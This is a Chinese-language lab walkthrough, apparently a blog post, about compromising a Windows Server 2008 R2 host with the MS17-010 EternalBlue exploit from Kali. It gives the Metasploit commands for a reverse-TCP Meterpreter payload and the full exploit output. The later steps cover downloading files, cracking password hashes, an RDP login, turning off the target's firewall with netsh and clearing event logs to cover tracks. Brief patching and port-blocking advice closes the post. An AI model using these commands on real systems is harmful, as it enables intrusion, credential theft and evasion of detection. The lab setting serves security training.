KALI利用MS17-010漏洞入侵

KALI利用MS17-010漏洞入侵

实验环境

靶机 : Windows Server 2008 R2 ,开放445端口( Windows防火墙不必关闭)。
攻击机: KALI,利用Meterpreter渗透工具漏洞︰MS17-010永恒之蓝(EternalBlue)漏洞。

操作步骤

1)先利用NMAP扫描靶机是否开启了445端口。

在这里插入图片描述

2)在kali上启动msfconsole

在这里插入图片描述

3)扫描靶机的漏洞情况

在这里插入图片描述

4)利用MS17-010漏洞攻击靶机

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue		//切换到漏洞攻击脚本
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp		//使用反弹链接payload,让靶机主动连接KALI
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.129	//靶机IP地址
rhost => 192.168.10.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.128	//KAL地址
lhost => 192.168.10.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 	//开始攻击

[*] Started reverse TCP handler on 192.168.10.128:4444 
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445    - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445    - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76  Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010  65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20  er 2008 R2 7601 
[*] 192.168.10.129:445 - 0x00000020  53 65 72 76 69 63 65 20 50 61 63 6b 20 31        Service Pack 1  
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:4444 -> 192.168.10.129:49159) at 2020-11-27 12:06:37 +0800
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >	//攻击成功,此时靶机已经可以被控制

5)列出靶机C盘下的目录文件

在这里插入图片描述

6)下载文件

在这里插入图片描述
在这里插入图片描述

7)破解用户密码

在这里插入图片描述
密文可到www.cmd5.com中去破解。
在这里插入图片描述

8)远程桌面登录靶机

root@KALI:~# rdesktop -u administrator -p abc123 192.168.10.129:3389

在这里插入图片描述

9)屏幕截图

在这里插入图片描述
在这里插入图片描述

10)关闭防火墙

meterpreter > shell		//进入靶机的命令提示符环境
Process 2848 created.
Channel 4 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\>
C:\>netsh advfirewall set allprofiles state off		//关闭靶机的防火墙
netsh advfirewall set allprofiles state off
ȷ����

C:\>

11)清楚事件日志

清除前,在靶机上可以看见所有事件日志。
在这里插入图片描述
在KALI上清除日志信息
在这里插入图片描述
再去靶机上查看,发现只有一条清楚日志的记录.
在这里插入图片描述

MS17-010漏洞防范

1) 打补丁

KB976932 ( SP1 )、KB4012212、KB4012215

2) 利用系统防火墙高级设置阻止向445端口进行连接

在这里插入图片描述

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.10.128:4444 
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445    - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445    - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76  Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010  65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20  er 2008 R2 7601 
[*] 192.168.10.129:445 - 0x00000020  53 65 72 76 69 63 65 20 50 61 63 6b 20 31        Service Pack 1  
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
msf5 exploit(windows/smb/ms17_010_eternalblue) > 

可以看到连接失败!!!

  • 12
    点赞
  • 81
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值